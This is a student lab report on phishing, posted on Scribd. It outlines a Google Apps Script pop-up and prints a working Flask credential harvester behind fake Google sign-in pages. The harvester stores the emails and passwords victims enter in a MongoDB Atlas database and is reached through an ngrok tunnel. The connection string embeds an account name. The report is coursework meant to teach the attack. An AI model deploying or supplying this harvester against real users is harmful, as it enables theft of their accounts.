Scribd Logo
Upload

Welcome to Scribd!

  • 1 views

    Cybersecurity Lab8

    Uploaded by

    sa13841622

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    Cybersecurity Lab8

    Uploaded by

    sa13841622
    1 views13 pages

    Original Title

    202151084 Cybersecurity lab8

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    1 views13 pages

    Cybersecurity Lab8

    Uploaded by

    sa13841622

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    of 13

    Software and Cybersecurity (CS/IT 445)

    Lab Assignment 8
    Phishing Attacks

    Mamindla Sathvika
    202151084

    Objective: To understand, demonstrate, and document phishing techniques such as


    attachment-based phishing and credential harvesting. This assignment demonstrates how
    attackers attempt to compromise systems and gather sensitive information using phishing tactics.

    Task 1: Demonstration of Attachment-Based Phishing attack

    Objective

    To simulate an attachment-based phishing attack using Google App Scripts, which will display a
    message when a shared Google Document is accessed.

    Steps:

    1. Open Google Chrome Browser.


    2. Navigate to Google Docs by going to https://docs.google.com/.
    3. Open the App Scripts associated with the Google Doc:
    ○ Go to Extensions in the Google Docs menu.
    ○ Select App Scripts to open the scripting environment.

    4. Enter the Code:

    This code will display an alert with a message whenever someone opens the Google Document.

    5. Save and Reload the Document:

    ○ Save the script and reload the Google Doc.

    Explanation

    This simulates an attachment-based phishing attack by using Google App Scripts to execute a
    pop-up message. The attacker could use such tactics to coerce users into performing an action,
    such as making a payment.
    Task 2: Demonstration of Credential Harvesting Attack

    Objective:

    To simulate a credential harvesting phishing attack by creating a fake HTML email resembling a
    legitimate service and gathering credentials through an API endpoint.

    Prerequisites:
    Python, Flask, PyMongo, dnspython, ngrok, MongoDB

    ● HTML files for the phishing email and fake login pages
    ● Flask for API creation and request handling
    ● MongoDB Atlas for cloud-based credential storage
    ● Ngrok for port tunneling
    Step 1: Create a Replicated Google Email Page

    File Name: index.html

    ● Function: This HTML page alerts the user to a suspicious sign-in and asks them to
    review their account activity by clicking the “Review your Activity” button.
    ● Purpose: To create urgency for the user to interact with the button, leading to the
    phishing login page.

    Step 2: Set Up Login and Credential Harvesting Pages

    This step involves two pages that guide the user through a simulated Google login process.

    1. Email Login Page (login.html):


    ○ Purpose: Collects the user’s email ID, designed to look like a legitimate Google
    login screen.
    2. Password Page (password.html):
    ○ Purpose: Collects the user’s password and includes functionality for password
    visibility toggling.

    Step 3: Form and API Endpoint for Credential Harvesting

    Setup:

    ● Created a Flask application to serve as the API endpoint and manage requests between
    the HTML pages.
    ● Integrated MongoDB Atlas to store credentials securely on a cloud server.
    ● The Flask app captures email and password data from the fake login pages and routes it
    to MongoDB Atlas.

    Backend Code Functionality:

    ● Serves as a bridge between the frontend (HTML pages) and the database.
    ● Configures credential storage in MongoDB, appending new entries as they come in.

    main.py (Flask Application):

    from flask import Flask, render_template, request, redirect, url_for

    from pymongo import MongoClient


    from pymongo.server_api import ServerApi

    app = Flask(__name__)

    # MongoDB connection setup

    uri =
    "mongodb+srv://sathvika1609:[email protected]/?retryWrites=true&w
    =majority&appName=Sathvika"

    client = MongoClient(uri, server_api=ServerApi('1'))

    db = client['user_data'] # Replace 'user_data' with your database name

    users_collection = db['users'] # Replace 'users' with your collection name

    # Confirm MongoDB connection

    try:

    client.admin.command('ping')

    print("Pinged your deployment. You successfully connected to MongoDB!")

    except Exception as e:

    print("Error connecting to MongoDB:", e)

    @app.route('/')

    def index():

    # Render index.html, simulating a sign-in notification email

    learner = {

    "first_name": "Sathvika",

    "email": "[email protected]"

    return render_template('index.html', learner=learner)


    @app.route('/login', methods=['GET', 'POST'])

    def login():

    if request.method == 'POST':

    email = request.form['email']

    # Redirect to the password page, passing the email as a parameter

    return redirect(url_for('password', email=email))

    return render_template('login.html')

    @app.route('/password', methods=['GET', 'POST'])

    def password():

    email = request.args.get('email', '') # Get email from query string

    message = ""

    if request.method == 'POST':

    password = request.form['password']

    # Save email and password to MongoDB

    try:

    users_collection.insert_one({"email": email, "password": password})

    print(f"Stored Email: {email}, Password: {password} in MongoDB")

    message = "You have successfully entered your password."

    except Exception as e:

    print("Error saving to MongoDB:", e)

    message = "An error occurred while saving to the database."

    return render_template('password.html', email=email, message=message)

    if __name__ == '__main__':

    app.run(debug=True)
    Below is the output after running main.py file:

    Below is the output by running the command: ngrok http 5000

    Step 4: API Setup with Ngrok Port Tunneling

    ● Ngrok was used to expose the local server to the internet, providing an accessible link for
    the API endpoint. This URL was embedded within the email and button links.
    ● Testing: The setup was tested on both laptop and mobile device to ensure the link
    functioned correctly.

    After clicking the link given in the terminal after running ngrok command: the below was the
    page opened.
    After clicking the Visit Site on Laptop the below page was opened.
    When we click “Review Your Activity” The below page will open from which we can get the
    details of the user

    Step 5: Credential Storage in MongoDB

    ● MongoDB Atlas: Stores harvested data with each endpoint hit from the email and
    password pages.
    ● Verification: Inspected the MongoDB database to verify that credentials were logged
    with each interaction.
    Backend Process:

    Ngrok terminal

    Ngrok Traffic Inspector


    Flask Application terminal output:

    Login Through Mobile Phone via same link:


    Backend Process:

    We can see that 2nd credentials are also stored in the database

    Ngrok Terminal output:


    Ngrok Traffic Inspector:

    Flask Application terminal output:

    Successfully Demonstrated the Credential Harvesting Attack and stored the


    passwords in MongoDB database!

    You might also like